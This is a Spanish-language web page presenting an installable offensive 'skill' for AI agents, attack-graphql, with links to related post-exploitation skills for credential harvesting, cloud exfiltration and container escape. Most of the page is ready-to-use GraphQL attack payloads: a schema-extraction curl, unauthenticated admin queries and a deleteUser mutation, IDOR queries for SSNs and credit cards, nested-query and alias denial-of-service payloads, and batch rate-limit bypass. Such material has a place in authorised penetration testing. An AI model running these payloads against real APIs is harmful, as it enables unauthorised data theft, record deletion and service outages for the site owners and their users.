Menú
GraphQL vulnerability testing — introspection exposure, complexity DoS, batch abuse, mutation auth bypass
Instalar con Codex o Claude Copia este prompt, pégalo en Codex, Claude u otro asistente, y deja que revise la página de la skill y la instale por ti.
Basado en la clasificación ocupacional SOC
eBPF-based post-exploitation for kernel-level credential harvesting, process hiding, and traffic interception on Linux
AWS post-exploitation for IAM privilege escalation, data exfiltration, persistence, and operational security via boto3
Azure/Entra ID post-exploitation for tenant compromise, Key Vault extraction, managed identity abuse, and token manipulation
CI/CD pipeline attacks for secret extraction, pipeline injection, and supply chain compromise via GitHub/Jenkins/GitLab
Kubernetes post-exploitation for container escape, secret extraction, RBAC abuse, and cluster persistence
macOS post-exploitation for credential harvesting, DTrace monitoring, TCC bypass, and stealth operations via native tools
| name | attack-graphql |
| description | GraphQL vulnerability testing — introspection exposure, complexity DoS, batch abuse, mutation auth bypass |
| category | web-application |
| version | 1.0 |
| author | cyberstrike-official |
| tags | ["graphql","api","web","dos","attack"] |
| tech_stack | ["web","graphql"] |
| cwe_ids | ["CWE-200","CWE-284","CWE-770"] |
| chains_with | ["attack-idor-automation"] |
| prerequisites | [] |
| severity_boost | {"attack-idor-automation":"GraphQL introspection reveals IDOR-vulnerable queries"} |
Exploit GraphQL-specific vulnerabilities including schema exposure, query complexity abuse, and authorization bypass.
# Full GraphQL test suite
attack_script graphql_tester "https://TARGET/graphql" \
-H "Authorization:Bearer TOKEN" \
--json-output
# Custom depth/batch
attack_script graphql_tester "https://TARGET/graphql" \
--depth 15 --batch-count 100
# Full schema extraction
curl -s -X POST https://TARGET/graphql \
-H "Content-Type: application/json" \
-d '{"query":"{ __schema { types { name fields { name type { name } } } mutationType { fields { name args { name type { name } } } } queryType { fields { name } } } }"}'
If introspection is enabled, map all types, queries, mutations, and subscriptions.
# Access admin queries without auth
{ adminUsers { id email role } }
# Mutation without auth
mutation { deleteUser(id: "123") { success } }
# Access other user's data
{ user(id: "OTHER_USER_ID") { email ssn creditCard } }
# Deeply nested query
{ users { posts { comments { author { posts { comments { author { id } } } } } } } }
# Alias multiplication
{ a1: __typename a2: __typename ... a100: __typename }
# Batch queries (array)
[{"query":"{ __typename }"}, {"query":"{ __typename }"}, ... x50]
# Skip/include directive for info leakage
{ user(id: "1") { name email @skip(if: false) secretField @include(if: true) } }
# Field suggestions (error-based enum)
{ user { nonExistentField } }
# Error may suggest: "Did you mean: password, secret_key?"
| Finding | Severity |
|---|---|
| Introspection enabled (schema exposed) | Medium (P3) |
| Admin mutations accessible without auth | Critical (P1) |
| Other user data accessible (IDOR) | High (P2) |
| DoS via complexity (server timeout/crash) | Medium (P3) |
| Batch queries bypass rate limiting | Medium (P3) |
attack_script graphql_tester — automated introspection + DoS + batch testing